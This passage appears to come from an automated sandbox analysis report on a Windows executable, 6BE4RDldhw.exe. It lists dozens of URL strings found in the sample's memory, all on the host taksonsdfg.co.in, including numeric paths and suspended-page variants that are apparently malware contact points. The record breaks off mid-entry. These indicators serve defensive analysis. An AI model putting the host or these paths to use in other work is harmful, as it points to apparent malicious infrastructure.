      Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/1r
      Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FACD000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/234567876543212
      Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432121$
      Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza
      Source: 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza#
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza$
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza7
      Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmza8
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzaaq
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzak
      Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/2345678765432123456789876543/243_Yjnxmyasmzakb
      Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FABF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/234567876543212P
      Source: 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FA8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/234567876543212a
      Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/4
      Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/9r6k
      Source: 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Ar
      Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/H
      Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Ir
      Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Qr
      Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Qu
      Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/Yr
      Source: 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/ar
      Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-s
      Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345831810.0000000000919000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.000000000091A000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
      Source: 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi$
      Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi)r
      Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi4
      Source: 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.000000000090C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza
      Source: 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza-bRk
      Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000901000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaCb
      Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaIb
      Source: 6BE4RDldhw.exe, 00000000.00000003.2475345569.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_YjnxmyasmzaWb
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzakb
      Source: 6BE4RDldhw.exe, 00000000.00000003.1690257877.000000000090B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000909000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.000000000090B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmzaqb
      Source: 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-R
      Source: 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1435332784.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000901000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1648113930.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLas
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiU3
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgig3ok
      Source: 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgim
      Source: 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiqr
      Source: 6BE4RDldhw.exe, 00000000.00000003.1394882795.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1519974580.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/iu
      Source: 6BE4RDldhw.exe, 00000000.00000003.1961444779.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914742318.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827581814.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1870938682.0000000000903000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1917472858.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in/yr
      Source: 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza
      Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_Yjnxmyasmza0u
      Source: 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/2345678765432123456789876543/243_YjnxmyasmzaX
      Source: 6BE4RDldhw.exe, 00000000.00000003.2047547102.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2004240497.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1738626305.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000091C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi
      Source: 6BE4RDldhw.exe, 00000000.00000003.2129633802.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi$
      Source: 6BE4RDldhw.exe, 00000000.00000003.1519974580.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi1Content-LengthAllowWarningViaUpgradeTransfer-
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza
      Source: 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi43/243_Yjnxmyasmza0u
      Source: 6BE4RDldhw.exe, 00000000.00000003.1914742318.00000000008CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi8
      Source: 6BE4RDldhw.exe, 00000000.00000003.1648113930.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgi:
      Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2388478976.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2303973460.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiDASYC
      Source: 6BE4RDldhw.exe, 00000000.00000003.2434006872.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475345569.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.0000000000917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiP
      Source: 6BE4RDldhw.exe, 00000000.00000002.2598024798.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2047547102.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2261026230.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1961227445.0000000000928000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2089947021.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345256582.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2433861488.00000000206F3000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1475992472.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176965259.000000000093E000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1394988770.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1520540319.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1914704829.000000000093A000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2580778228.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2475288001.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 